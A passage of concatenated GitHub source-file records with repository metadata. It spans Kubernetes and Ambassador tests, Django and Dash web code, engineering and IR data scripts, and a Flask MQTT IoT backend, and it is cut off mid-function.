rbac.authorization.k8s.io/v1beta1\nkind: ClusterRoleBinding\nmetadata:\n name: ambassador\nroleRef:\n apiGroup: rbac.authorization.k8s.io\n kind: ClusterRole\n name: ambassador\nsubjects:\n- kind: ServiceAccount\n name: ambassador\n namespace: {namespace}\n\"\"\"\n\n self.apply_kube_artifacts(namespace=namespace, artifacts=namespace_crb)\n\n ambassador_service_path = \"/buildroot/ambassador/docs/yaml/ambassador/ambassador-service.yaml\"\n install_ambassador_service_cmd = ['kubectl', 'apply', '-n', namespace, '-f', ambassador_service_path]\n self.run_and_assert(install_ambassador_service_cmd)\n\n def meta_action_kube_artifacts(self, namespace, artifacts, action):\n temp_file = tempfile.NamedTemporaryFile()\n temp_file.write(artifacts.encode())\n temp_file.flush()\n self.run_and_assert(['kubectl', action, '-n', namespace, '-f', temp_file.name])\n temp_file.close()\n\n def apply_kube_artifacts(self, namespace, artifacts):\n self.meta_action_kube_artifacts(namespace=namespace, artifacts=artifacts, action='apply')\n\n def delete_kube_artifacts(self, namespace, artifacts):\n self.meta_action_kube_artifacts(namespace=namespace, artifacts=artifacts, action='delete')\n\n def apply_qotm_endpoint_manifests(self, namespace):\n qotm_resolver = f\"\"\"\napiVersion: getambassador.io/v1\nkind: KubernetesEndpointResolver\nmetadata:\n name: qotm-resolver\n namespace: {namespace}\n\"\"\"\n\n self.apply_kube_artifacts(namespace=namespace, artifacts=qotm_resolver)\n self.create_qotm_mapping(namespace=namespace)\n\n def create_qotm_mapping(self, namespace):\n qotm_mapping = f\"\"\"\n---\napiVersion: getambassador.io/v1\nkind: Mapping\nmetadata:\n name: qotm-mapping\n namespace: {namespace}\nspec:\n prefix: /qotm/\n service: qotm.{namespace}\n resolver: qotm-resolver\n load_balancer:\n policy: round_robin\n \"\"\"\n\n self.apply_kube_artifacts(namespace=namespace, artifacts=qotm_mapping)\n\n def delete_qotm_mapping(self, namespace):\n qotm_mapping = f\"\"\"\n---\napiVersion: getambassador.io/v1\nkind: Mapping\nmetadata:\n name: qotm-mapping\n namespace: {namespace}\nspec:\n prefix: /qotm/\n service: qotm.{namespace}\n resolver: qotm-resolver\n load_balancer:\n policy: round_robin\n \"\"\"\n\n 
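# delete the mapping using the same manifest that created it
        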
self.delete_kube_artifacts(namespace=namespace, artifacts=qotm_mapping)\n\n def test_rapid_additions_and_deletions(self):\n namespace = 'watt-rapid'\n\n # Install Ambassador\n self.install_ambassador(namespace=namespace)\n\n # Install QOTM\n self.apply_kube_artifacts(namespace=namespace, artifacts=self.qotm_manifests)\n\n # Install QOTM Ambassador manifests\n self.apply_qotm_endpoint_manifests(namespace=namespace)\n\n # Now let's wait for ambassador and QOTM pods to become ready\n self.run_and_assert(['kubectl', 'wait', '--timeout=90s', '--for=condition=Ready', 'pod', '-l', 'service=ambassador', '-n', namespace])\n self.run_and_assert(['kubectl', 'wait', '--timeout=90s', '--for=condition=Ready', 'pod', '-l', 'service=qotm', '-n', namespace])\n\n # Let's port-forward ambassador service to talk to QOTM\n port_forward_port = 6000\n port_forward_command = ['kubectl', 'port-forward', '--namespace', namespace, 'service/ambassador', f'{port_forward_port}:80']\n self.run_and_assert(port_forward_command, communicate=False)\n qotm_url = f'http://localhost:{port_forward_port}/qotm/'\n\n # Assert 200 OK at /qotm/ endpoint\n qotm_ready = False\n\n loop_limit = 60\n while not qotm_ready:\n assert loop_limit > 0, \"QOTM is not ready yet, aborting...\"\n try:\n connection = request.urlopen(qotm_url, timeout=5)\n qotm_http_code = connection.getcode()\n assert qotm_http_code == 200, f\"Expected 200 OK, got {qotm_http_code}\"\n connection.close()\n print(f\"{qotm_url} is ready\")\n qotm_ready = True\n\n except Exception as e:\n print(f\"Error: {e}\")\n print(f\"{qotm_url} not ready yet, trying again...\")\n time.sleep(1)\n loop_limit -= 1\n\n # Try to mess up Ambassador by applying and deleting QOTM mapping over and over\n for i in range(10):\n self.delete_qotm_mapping(namespace=namespace)\n self.create_qotm_mapping(namespace=namespace)\n\n # Let's give Ambassador some time to register the changes\n time.sleep(60)\n\n # Assert 200 OK at /qotm/ endpoint\n connection = request.urlopen(qotm_url, timeout=5)\n qotm_http_code = connection.getcode()\n assert qotm_http_code == 200, f\"Expected 200 OK, got {qotm_http_code}\"\n connection.close()\n\ndef test_watt():\n watt_test = WattTesting()\n watt_test.test_rapid_additions_and_deletions()\n\n\nif __name__ == '__main__':\n test_watt()\n","repo_name":"holahula/ambassador","sub_path":"python/tests/test_watt_scaling.py","file_name":"test_watt_scaling.py","file_ext":"py","file_size_in_byte":7962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"228103054","text":"from django import forms\nfrom django.conf import settings\n\nfrom .models import Tweet\n\n\nclass TweetForm(forms.ModelForm):\n class Meta:\n model = Tweet\n fields = [\n 'content'\n ]\n\n def clean_content(self):\n content = self.cleaned_data.get(\"content\")\n if len(content) > settings.MAX_TWEET_LENGTH:\n raise forms.ValidationError(\"The tweet is too long\")\n else:\n return content\n","repo_name":"ofisser86/tweetme2","sub_path":"tweets/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"12876351242","text":"from DataHandler import DataHandler\nimport itertools\n\ndata_handler = DataHandler()\n\ntry:\n print(data_handler)\n print(\"\")\n df_names = data_handler.files\n df_combinations = itertools.combinations(df_names,2)\n for combination in df_combinations:\n common_columns = 
data_handler.list_all_columns(selected_columns=combination)\n        column1 = list(common_columns.values())[0]\n        column2 = list(common_columns.values())[1]\n        intersection = set(column1).intersection(column2)\n        if not intersection:\n            continue\n        print(\"Columns %s, %s have %s in common\" % (list(common_columns.keys())[0], list(common_columns.keys())[1], intersection))\n        print(\"\")\nexcept Exception as e:\n    print(e)","repo_name":"MoldaB/IIoTProject2-DataAnalytics","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"10059248749","text":"import csv\nimport os\nimport itemfinder\n\n\ndef getEquipmentList():\n    out = []\n    \n    with open(\"_append/data/text/equipment.csv\",\"r\") as f:\n        reader = csv.reader(f)\n        for row in reader:\n            if \"_\" not in row[0] and \"?\" not in row[0] and row[0] != \"Name\":\n                out.append(row[0])\n    return(out)\n\ndef mainscript():\n    \"\"\"\n    writes out a list of equipment, and the episodes it appears in\n    \n    \"\"\"\n    gens = [\"robot_youchooseyoulose\",\"jester_finderskeepers\",\"thief_finderskeepers\",\"jester_warrior\",\"inventor_rust\",\"thief_uptick\"]\n    pref = [\"warrior\",\"thief\",\"robot\",\"inventor\",\"witch\",\"jester\"]\n    for p in pref:\n        gens.append(p+\"_normal\")\n    eqs = {}\n    for g in gens:\n        eqs[g] = itemfinder.mainscript(g)\n    for p in pref:\n        pu = p + \"_paralleluniverse\"\n        br = p + \"_remixgenerator\"\n        eqs[pu] = itemfinder.mainscript(pu)\n        eqs[br] = itemfinder.mainscript(br)\n    outfile = open(\"file/equipment_list.txt\",\"w+\")\n    notfound = open(\"file/not_found.txt\",\"w+\")\n    for eq in getEquipmentList():\n        flag = True\n        outfile.write(eq+\"\\n\")\n        for e in eqs:\n            if eq in eqs[e]:\n                outfile.write(\"* \"+e+\"\\n\")\n                flag = False\n        if flag: #hasn't been found, flag it!\n            print(f\"Item {eq} not found in generators\")\n            notfound.write(eq+\"\\n\")\n        outfile.write(\"------\\n\")\n    print(\"Press enter to exit\")\n    input()\n    \nif __name__ == \"__main__\":\n    mainscript()\n","repo_name":"JuniorUdale/MoreFluff","sub_path":"epfinder.py","file_name":"epfinder.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"}{"seq_id":"4027163251","text":"dict1 = {'w':4, 'p':3, 'b':2, 's':1}\ndict2 = {'m':4, 'q':3, 'd':2, 'z':1}\n\ndef alphabet_war(fight):\n    count, count1 = 0,0\n    for i in fight:\n\n        if i in dict1:\n            count = count + dict1[i]\n        if i in dict2:\n            count1 = count1 + dict2[i]\n    print(count, count1)\n\n    if count > count1:\n        print(\"Left side wins!\")\n    elif count < count1:\n        print(\"Right side wins!\")\n    else:\n        print(\"Let's fight again!\")\n\n\n\"\"\"def alphabet_war(fight):\n    d = {'w':4,'p':3,'b':2,'s':1,\n         'm':-4,'q':-3,'d':-2,'z':-1}\n    r = sum(d[c] for c in fight if c in d)\n    \n    return {r==0:\"Let's fight again!\",\n            r>0:\"Left side wins!\",\n            r<0:\"Right side wins!\"\n            }[True]\n    \"\"\"","repo_name":"heenashree/AlgorithmsAndDataStructs","sub_path":"Python Codes/XML-YAML/WinWar.py","file_name":"WinWar.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}{"seq_id":"257381019","text":"from datetime import datetime as dt\nimport texttable\n\n\nclass Method(object):\n    def __init__(self, description, action):\n        self.description = description\n        self.action = action\n\n\nclass Case(object):\n    def __init__(self, name, *args, **kwargs):\n        self.name = name\n        self.args = args\n        self.kwargs = 
kwargs\n\n\ndef run_experiment(clean_up_action, methods, cases):\n timings = {}\n\n for case in cases:\n for method in methods:\n clean_up_action()\n start_time = dt.now()\n method.action(*case.args, **case.kwargs)\n elapsed_time = dt.now() - start_time\n\n if method.description not in timings:\n timings[method.description] = {}\n\n timings[method.description][case.name] = elapsed_time\n\n table = texttable.Texttable(max_width=0)\n\n col_dtypes = [\"t\"]\n header = [\"Method\"]\n for case in cases:\n col_dtypes.append(\"a\")\n header.append(case.name)\n\n table.set_cols_dtype(col_dtypes)\n table.add_row(header)\n\n for method_desc, method_timings in timings.items():\n row = [method_desc]\n for _, case_time in method_timings.items():\n row.append(str(case_time).split('.')[0])\n\n table.add_row(row)\n\n print(table.draw())\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/prototype_testing/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39278682596","text":"from Circuit_element import Element_R\nfrom Circuit_element import Element_V\nfrom Circuit_element import Element_I\nfrom Circuit_control import Control_op\nfrom Circuit_control import Control\n\ndef netlist_element_deal(net_line):\n elem = net_line.split()\n # result [obj,statue]\n # statue 0 : Element obj , 1 : Control obj , 2 : Model obj , 0 < error\n if Control.Control.Control_statue == 0:\n if elem[0][0] == 'v' or elem[0][0] == 'V': #DC source\n obj = Element_V.Element_V(elem[0])\n obj.import_elem(elem[1],elem[2],elem[3:])\n return [obj,0]\n elif elem[0][0] == 'i' or elem[0][0] == 'I': #AC source\n obj = Element_I.Element_I(elem[0])\n obj.import_elem(elem[1],elem[2],elem[3:])\n return [obj,0]\n elif elem[0][0] == 'r' or elem[0][0] == 'R': #Resistor\n obj = Element_R.Element_R(elem[0])\n obj.import_elem(elem[1],elem[2],elem[3:])\n return [obj,0]\n elif elem[0].lower() == '.op': # OP sim\n obj = Control_op.Control_op(elem)\n return [obj,1]\n elif elem[0].lower() == '.control': #Control deck\n obj = Control.Control_control()\n return [obj,1]\n elif elem[0].lower() == '.end': #Netlist end\n obj = Control.Control_end()\n return [obj,1]\n else:\n return [-3,-3]\n elif Control.Control.Control_statue == 1:\n if elem[0].lower() == '.endc': #Control deck end\n obj = Control.Control_endc()\n return [obj,1]\n else:\n obj = Control.Ngspice_control(elem)\n return [obj,1]\n elif Control.Control.Control_statue == -1:\n print(\"Netlist End\")\n return [-1,-1]\n else :\n print(str(elem))\n return [-2,-2]\n","repo_name":"tang5722917/spice_netlist_front_end","sub_path":"src/circuit_element_func.py","file_name":"circuit_element_func.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36492579654","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport dash_bootstrap_components as dbc\nimport pandas as pd\nimport dash_table\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport numpy as np\nfrom app import app\ndf_fp = pd.read_csv('../output/dataMining/FP_Growth_ar.csv')\ndf_perf = pd.read_csv('../output/dataMining/FP_Growth_performance.csv')\n# def generate_table(dataframe, max_rows=10):\n# return dbc.Table([\n# html.Thead(\n# html.Tr([html.Th(col) for col in dataframe.columns])\n# ),\n# 
html.Tbody([\n#             html.Tr([\n#                 html.Td(dataframe.iloc[i][col]) for col in dataframe.columns\n#             ]) for i in range(min(len(dataframe), max_rows))\n#         ])\n#     ],\n#     bordered=True,\n#     hover=True,\n#     responsive=True,\n#     striped=True,\n#     size=\"md\",id=\"dtBasicExample\")\n\nfig2 = px.scatter(df_perf, x=\"support\", y=\"time\", color=\"confidence\",color_continuous_scale=px.colors.sequential.Viridis,log_x=True, render_mode=\"webgl\")\nfig2.layout.paper_bgcolor = '#fafafa'\n\nlayout=html.Div(children=[\n    dbc.Row(html.H1('FP-growth',style={\n        'text-align' : 'center'\n\n    },className=\"mx-auto mt-20\"))\n    ,\n    html.Hr(),\n\n    dbc.Row(html.H2('rules generated by FP-growth',style={\n        'text-align' : 'center'\n\n    },className=\"mx-auto mt-20\")),\n    html.Hr(),\n    dbc.Row([\n        dbc.Col(dbc.Card(\n            [\n                \n                dbc.CardBody(\n                    [\n                        html.H4(str(round(df_fp['confidence'].max(),2)), className=\"card-title\"),\n                        html.P(\"best confidence\", className=\"card-text\"),\n                    ]\n                ),\n                \n            ],color=\"info\", outline=True\n            \n        )),\n        dbc.Col(dbc.Card(\n            [\n                \n                dbc.CardBody(\n                    [\n                        html.H4(str(round(df_fp['lift'].max(),2)), className=\"card-title\"),\n                        html.P(\"best lift\", className=\"card-text\"),\n                    ]\n                ),\n                \n            ],color=\"info\", outline=True\n            \n        )),\n        dbc.Col(dbc.Card(\n            [\n                \n                dbc.CardBody(\n                    [\n                        html.H4(str(round(df_fp['leverage'].max(),2)), className=\"card-title\"),\n                        html.P(\"best leverage\", className=\"card-text\"),\n                    ]\n                ),\n                \n            ],color=\"info\", outline=True\n            \n        )),\n        dbc.Col(dbc.Card(\n            [\n                \n                dbc.CardBody(\n                    [\n                        html.H4(str(round(df_fp['conviction'].max(),2)), className=\"card-title\"),\n                        html.P(\"best conviction\", className=\"card-text\"),\n                    ]\n                ),\n                \n            ],color=\"info\", outline=True\n            \n        ))\n    ]),\n\n    html.Hr(),\n\n    html.Div(dash_table.DataTable(\n        id='datatable-paging',\n        columns=[{\"name\": i, \"id\": i} for i in df_fp.columns],\n        data=df_fp.to_dict(\"records\"),\n        editable=False,\n        filter_action=\"native\",\n        sort_action=\"native\",\n        sort_mode=\"multi\",\n        page_action=\"native\",\n        page_current= 0,\n        page_size= 10,\n        style_data_conditional=[\n            {\n                'if': {'row_index': 'odd'},\n                'backgroundColor': 'rgb(248, 248, 248)'\n            }\n        ],\n        style_header={\n            'backgroundColor': 'rgb(230, 230, 230)',\n            'fontWeight': 'bold'\n        }\n    )),\n    html.Hr(),\n\n    dbc.Row(html.H2('line chart of execution time by confidence and support', style={\n        'text-align': 'center'\n\n    }, className=\"mx-auto my-20\"))\n    ,\n    dbc.Row([dbc.Col(dbc.Card([\n        dbc.CardHeader(html.H4(\"Controller\"))\n        ,\n        dbc.CardBody([\n            dbc.FormGroup(\n                [\n                    dbc.Label(\"transaction number\"),\n                    dcc.Dropdown(\n                        id='transaction',\n                        options=[{'label': i, 'value': i} for i in list(df_perf['transaction_number'].unique())],\n                        value=\"980\",\n                        searchable=False,\n                        clearable=False\n                    ),\n                ]\n            ),\n            dbc.FormGroup(\n                [\n                    dbc.Label(\"X variable\"),\n                    dcc.Dropdown(\n                        id=\"x-variable\",\n                        options=[\n                            {\"label\": col, \"value\": col} for col in [\"confidence\",\"support\"]\n                        ],\n                        value=\"support\",\n                        searchable=False,\n                        clearable=False\n\n                    ),\n                ]\n            )])]),width=3),\n    dbc.Col(dcc.Graph(id=\"line-graph\"),width=9)],className=\"align-items-center\"),\n    html.Hr(),\n    dbc.Row(html.H2(\"Multi-Variables scatter plot\",className=\"mx-auto mt-20\")),\n    dbc.Row(dbc.Col(dcc.Graph(figure=fig2)))\n    ])\n\n\n@app.callback(\n    Output('line-graph', 'figure'),\n    [Input('transaction', 'value'),\n    Input('x-variable', 'value')])\ndef update_graph(transaction_number, x_variable):\n\n    fig1 = px.line(x=df_perf[df_perf.transaction_number == int(transaction_number)].groupby(x_variable)[['time']].mean().index.tolist(),\n                   
y=df_perf[df_perf.transaction_number == int(transaction_number)].groupby(x_variable)[['time']].mean().values)\n    fig1.update_yaxes(title_text='average execution time (s)')\n    fig1.update_xaxes(title_text=x_variable)\n    fig1.update_layout(xaxis_type=\"log\")\n    fig1.layout.paper_bgcolor = '#fafafa'\n    return fig1\n\n\n#@app.callback(\n#    Output(\"fp_tab\", \"children\"),\n#    [Input(\"input_text\", \"value\")]\n#)\n#def cb_render(vals):\n#    return generate_table(df_fp,max_rows=int(vals))\n\n\n","repo_name":"Hassaine/recommender-system","sub_path":"dashboards/pages/fp_growth_dash.py","file_name":"fp_growth_dash.py","file_ext":"py","file_size_in_byte":6070,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}{"seq_id":"28787435032","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar  4 20:55:36 2023\n\n@author: Christoffer\n\"\"\"\n\nfrom pyfluidproperties import properties as prop\nfrom pyfluidproperties import fluid_id, unit_sys\nfrom dimensionless_numbers import dimensionless_numbers\n\nimport numpy as np\n\ndef main():\n    \n    ### Inputs ###\n    pressure = 10.3         # bar(a)\n    temperature = 250       # C\n    \n    pipe_diameter = 80*1e-3 # m\n    pipe_length = 100       # m\n    roughness = .05*1e-3    # m\n    \n    mass_flow = .5          # kg/s \n    \n    ### Init objects ###\n    fluid = prop(fluid = fluid_id.Water, unit_system = unit_sys.SI_bar_kJ)\n    dim_num = dimensionless_numbers(fluid)\n    \n    ### Calculations ###\n    fluid.update(p = pressure, T = temperature)\n    \n    pipe_area = pipe_diameter**2*np.pi/4\n    fluid_velocity = mass_flow/fluid.rho/pipe_area\n    \n    re_d = dim_num.reynolds_number(fluid_velocity, pipe_diameter)\n    fric = friction_factor(pipe_diameter, roughness, re_d)\n    \n    pressure_loss = fric*pipe_length/pipe_diameter*.5*fluid.rho*fluid_velocity**2\n    \n    ### Output ###\n    print(fluid)\n    print(f'Fluid velocity = {fluid_velocity:.1f} m/s, pressure loss = {(pressure_loss*1e-5):.2f} bar')\n\n    \ndef friction_factor(pipe_diameter,roughness, reynolds_number):\n    \"\"\"\n    Returns the Darcy friction factor using \n    Swamee-Jain approximation (turbulent flow)\n\n    Parameters\n    ----------\n    pipe_diameter: float pipe diameter (m)\n    roughness :    float roughness eps (m)\n    reynolds_number : float Reynolds number (-)\n\n    Returns\n    -------\n    float darcy friction factor (-)\n\n    \"\"\"\n    \n    reynolds_laminar = 2000 # (-)\n    reynold_turbulent = 4000 # (-)\n    \n    if reynolds_number < reynolds_laminar:\n        friction_factor = 64/ reynolds_number\n    else:\n        # Swamee-Jain\n        relative_roughness = roughness/pipe_diameter\n        friction_factor = 0.25/((np.log10((relative_roughness/3.7)+(5.74/(reynolds_number**.9))))**2)\n        if reynolds_number <= reynold_turbulent:\n            print('Warning, Critical regime. 
Flow is unsteady, Laminar friction factor assumed -> higher pressure loss')\n return friction_factor\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ChristofferRa/pyfluidproperties","sub_path":"examples/pressure_loss.py","file_name":"pressure_loss.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"9401619067","text":"from collections import defaultdict\nimport pyterrier as pt\nif not pt.started():\n pt.init(boot_packages=[\"com.github.terrierteam:terrier-prf:-SNAPSHOT\"])\nfrom pyterrier.model import split_df\nfrom fire import Fire\nimport pandas as pd\nfrom tqdm import tqdm\nimport logging\nimport json\nimport re\nfrom math import ceil\nimport ir_datasets as irds\nfrom pyterrier_pisa import PisaIndex\nfrom os.path import join\n\ndef convert_to_dict(result):\n result = result.groupby('qid').apply(lambda x: dict(zip(x['docno'], zip(x['score'], x['rank'])))).to_dict()\n return result\n\ndef pivot_batch(batch):\n records = []\n pos_list = batch.apply(lambda x : (str(x.qid), str(x.doc_id_a)), axis=1).tolist()\n for row in batch.itertuples():\n records.extend([{\n 'qid': str(row.qid),\n 'docno': str(row.doc_id_a),\n },\n ])\n return pd.DataFrame.from_records(records), pos_list\n\ndef convert_to_dict(result):\n result.drop_duplicates(['qid', 'docno'], inplace=True)\n lookup = defaultdict(lambda : defaultdict(int))\n for row in result.itertuples():\n lookup[str(row.qid)][str(row.docno)] = float(row.score)\n return lookup\n\ndef sample_neg(neg_pool, num_negs):\n if len(neg_pool) < num_negs:\n logging.info(f'not enough negs, sampling with replacement {len(neg_pool)} < {num_negs}')\n return neg_pool.sample(n=num_negs, replace=True)\n else:\n return neg_pool.sample(n=num_negs)\n\nclean = lambda x : re.sub(r\"[^a-zA-Z0-9¿]+\", \" \", x)\n\ndef main(out_path : str, \n subset : int = 100000, \n num_negs : int = 32, \n batch_size : int = 1000, \n data_split : str = 'train/triples-small',\n docpairs_file : str = None,\n val_split : int = None):\n \n dataset = irds.load(f\"msmarco-passage/{data_split}\")\n queries = pd.DataFrame(dataset.queries_iter()).set_index('query_id')['text'].to_dict()\n docs = pd.DataFrame(dataset.docs_iter()).set_index('doc_id')['text'].to_dict()\n\n pt_index = pt.get_dataset(\"msmarco_passage\").get_index(\"terrier_stemmed\")\n pt_index = pt.IndexFactory.of(pt_index, memory=False)\n bm25_scorer = pt.text.scorer(body_attr=\"text\", wmodel=\"BM25\", background_index=pt_index)\n index = PisaIndex.from_dataset(\"msmarco_passage\", threads=8)\n\n def get_query_text(x):\n df = pd.DataFrame({'qid' : x.values, 'query' : x.apply(lambda qid : clean(queries[str(qid)]))})\n return df\n\n bm25 = pt.apply.generic(lambda x : get_query_text(x)) >> index.bm25(k1=1.2, b=0.75, num_results=1000) >> pt.text.get_text(pt.get_dataset('irds:msmarco-passage/train/triples-small'), 'text')\n \n def score(batch, norm=False):\n new, _ = pivot_batch(batch.copy())\n topics = new['qid'].drop_duplicates()\n # score with bm25 over all topics and if any (qid docno) pair from new is missing, rsecore missing records with bm25 scorer \n res = bm25.transform(topics)[['qid', 'docno', 'score']]\n\n new['query'] = new['qid'].apply(lambda qid : clean(queries[str(qid)]))\n new['text'] = new['docno'].apply(lambda qid : clean(docs[str(qid)]))\n batch_score = bm25_scorer.transform(new)[['qid', 'docno', 'score']]\n res = pd.concat([res, batch_score]).drop_duplicates(['qid', 'docno']).reset_index(drop=True)\n\n if 
norm:\n # minmax norm over each query score set \n res['score'] = res.groupby('qid', group_keys=False)['score'].apply(lambda x: (x - x.min()) / (x.max() - x.min()))\n return res\n\n if docpairs_file:\n train = pd.read_csv(docpairs_file, sep='\\t', index_col=False)\n else: \n train = pd.DataFrame(dataset.docpairs_iter()).rename(columns={'query_id': 'qid',})\n \n qrels = pd.DataFrame(dataset.qrels_iter()).rename(columns={'query_id': 'qid'})\n\n if val_split:\n val = pd.DataFrame({'qid' : [], 'doc_id_a': []})\n val_to_retrieve = val_split\n while val_to_retrieve > 0:\n tmp = train.drop_duplicates('qid').sample(n=val_to_retrieve)\n tmp = tmp[tmp['qid'].isin(qrels['qid'].unique()) & ~tmp['qid'].isin(val['qid'].unique())]\n train = train[~train['qid'].isin(tmp['qid'])]\n val_to_retrieve -= len(tmp)\n val = pd.concat([val, tmp[['qid', 'doc_id_a']]])\n val.rename(columns={'doc_id_a': 'docno'}, inplace=True)\n\n # get top 100 by score by sorting by qid and score then take top 100 grouped by qid\n ranks = bm25.transform(val['qid'].drop_duplicates())[['qid', 'docno', 'score']].sort_values(['qid', 'score'], ascending=[True, False]).groupby('qid').head(100)[['qid', 'docno']]\n val = pd.concat([val, ranks]).drop_duplicates(['qid', 'docno'])\n val['score'] = 0.\n val.to_csv(join(out_path, f'triples.{num_negs}.val.tsv.gz'), sep='\\t', index=False)\n\n to_retrieve = subset \n main_lookup = {}\n new_set = []\n\n while to_retrieve > 0: \n sub = train.sample(n=to_retrieve).rename(columns={'doc_id_b': 'doc_id_b_0',})\n for _sub in tqdm(split_df(sub, ceil(len(sub) / batch_size)), desc=\"Total Batched Iter\"):\n _triples = _sub.copy()\n new, pos_list = pivot_batch(_triples)\n res = score(_sub, norm=True).groupby('qid').filter(lambda x : len(x) >= num_negs)\n _triples = _triples[_triples['qid'].isin(res['qid'].unique())]\n to_retrieve -= len(_triples)\n neg_pool = res.copy()\n neg_pool = neg_pool[~neg_pool[['qid', 'docno']].isin(pos_list)].reset_index(drop=True)\n negs = neg_pool.groupby('qid').apply(lambda x : sample_neg(x, num_negs)).reset_index(drop=True)[['qid', 'docno']]\n new = pd.concat([new, negs])\n negs = negs.groupby('qid')['docno'].apply(list).to_dict()\n\n _triples['doc_id_b'] = _triples['qid'].apply(lambda x : negs[str(x)])\n\n results_lookup = convert_to_dict(res)\n\n def lookup(x):\n try:\n return results_lookup[str(x.qid)][str(x.docno)]\n except KeyError:\n if (str(x.qid), str(x.docno)) in pos_list: return 1.\n return 0.\n new['score'] = new.apply(lambda x : lookup(x), axis=1)\n main_lookup.update(convert_to_dict(new))\n new_set.append(_triples[['qid', 'doc_id_a', 'doc_id_b']])\n\n with open(join(out_path, f'lookup.{num_negs}.json'), 'w') as f:\n json.dump(main_lookup, f)\n \n new_set = pd.concat(new_set)\n new_set.to_csv(join(out_path, f'triples.{num_negs}.train.tsv.gz'), sep='\\t', index=False)\n\n\n return \"Done!\"\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n Fire(main)","repo_name":"Parry-Parry/LexicalDistillation","sub_path":"lexdistill/util/exhaustive_sample.py","file_name":"exhaustive_sample.py","file_ext":"py","file_size_in_byte":6720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1265071249","text":"from flask import Flask, g, request\nfrom flask_cors import CORS\nfrom discord_webhook import DiscordWebhook, DiscordEmbed\nimport paho.mqtt.client as mqtt\nfrom threading import Thread, Timer\nfrom shared.services.mysql_service import MySQLService\nfrom dotenv import load_dotenv\nimport os, ast, 
requests, datetime, airporttime, pytz, json\n\nfrom cheryl_node import bp_cheryl\nfrom john_node import bp_john\nfrom timmy_node import bp_timmy\nfrom main import bp_main\n\nload_dotenv()\n\nlights_dict = {\n \"1\": 1,\n \"Corridor\": 2,\n \"2\": 3,\n}\n\naircon_dict = {\n \"1\": 4,\n \"2\": 5\n}\n\napp = Flask(__name__)\napp.config['JSON_SORT_KEYS'] = False\napp.secret_key = os.getenv(\"APP_SECRET_KEY\")\n\ncors = CORS(app, resources={r\"/api/*\" : {\"origins\": \"*\"}})\n\napp.register_blueprint(bp_cheryl, url_prefix='/api/node_1')\napp.register_blueprint(bp_john, url_prefix='/api/node_2')\napp.register_blueprint(bp_timmy, url_prefix='/api/node_3')\napp.register_blueprint(bp_main)\n\n@app.route('/webhook', methods=['POST'])\ndef webhook():\n Thread(target=lambda: [os.system(\"git pull\")]).start()\n return \"ok\"\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return ('''\n
    <title>Not Found</title>\n    <h1>Not Found</h1>\n    <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    \n \n '''), 404\n\ndef request_has_connection():\n return (\n (\"dbconn\" in g) and (g.dbconn is not None)\n and\n (\"client\" in g)\n )\n\n@app.before_request\ndef get_request_connection():\n if not request_has_connection():\n g.dbconn = MySQLService(os.getenv(\"CLOUD_DATABASE_HOST\"), os.getenv(\"CLOUD_DATABASE_USERNAME\"), os.getenv(\"CLOUD_DATABASE_PASSWORD\"), os.getenv(\"CLOUD_DATABASE_NAME\")) # type: ignore\n g.client = client\n\n@app.teardown_request\ndef close_db_connection(ex):\n if request_has_connection():\n dbconn = g.pop('dbconn', None)\n g.pop('client', None)\n if (dbconn is not None):\n dbconn.close()\n\ndef on_connect(client, userdata, flags, rc):\n print(f\"Connected with RC: {str(rc)}\")\n pass\n \ndef on_publish(client, data, result):\n print(\"Message sent to MQTT broker\")\n pass\n\ndef on_message(client, userdata, msg):\n message_mqtt = msg.payload.decode()\n if (msg.topic not in [\"/cheryl_node\", \"/john_node\", \"/timmy_node\"]):\n print(\"Received unknown topic message: \", message_mqtt)\n if msg.topic == \"/john_node\":\n json_message = ast.literal_eval(message_mqtt)\n if (json_message[\"sender\"] == \"Edge\"):\n message = None\n if (json_message[\"title\"] == \"Lights\"):\n with mqtt_dbconn:\n mqtt_dbconn.update(\"appliance_status\", [\"status\"], [\"appliance_id\"], [int(json_message[\"status\"]), lights_dict[json_message[\"room\"]]])\n message = \"Lights in \" + json_message[\"room\"] + \" turned \" + (\"On\" if (int(json_message[\"status\"]) == 1) else \"Off\")\n elif (json_message[\"title\"] == \"Room Count\"):\n with mqtt_dbconn:\n if (json_message[\"action\"] == \"Inc\"):\n mqtt_dbconn.increment_field(\"people_in_room\", [\"room\"], \"people_count\", [int(json_message[\"room\"])])\n elif (json_message[\"action\"] == \"Dec\"):\n mqtt_dbconn.decrement_field(\"people_in_room\", [\"room\"], \"people_count\", [int(json_message[\"room\"])])\n elif (json_message[\"title\"] == \"Update Uptime\"):\n with mqtt_dbconn:\n today = datetime.date.today().strftime(\"%Y-%m-%d\")\n data = mqtt_dbconn.get_by_id(\"appliance_uptime\", [\"appliance_id\", \"date\"], [json_message[\"appliance_id\"], today])\n 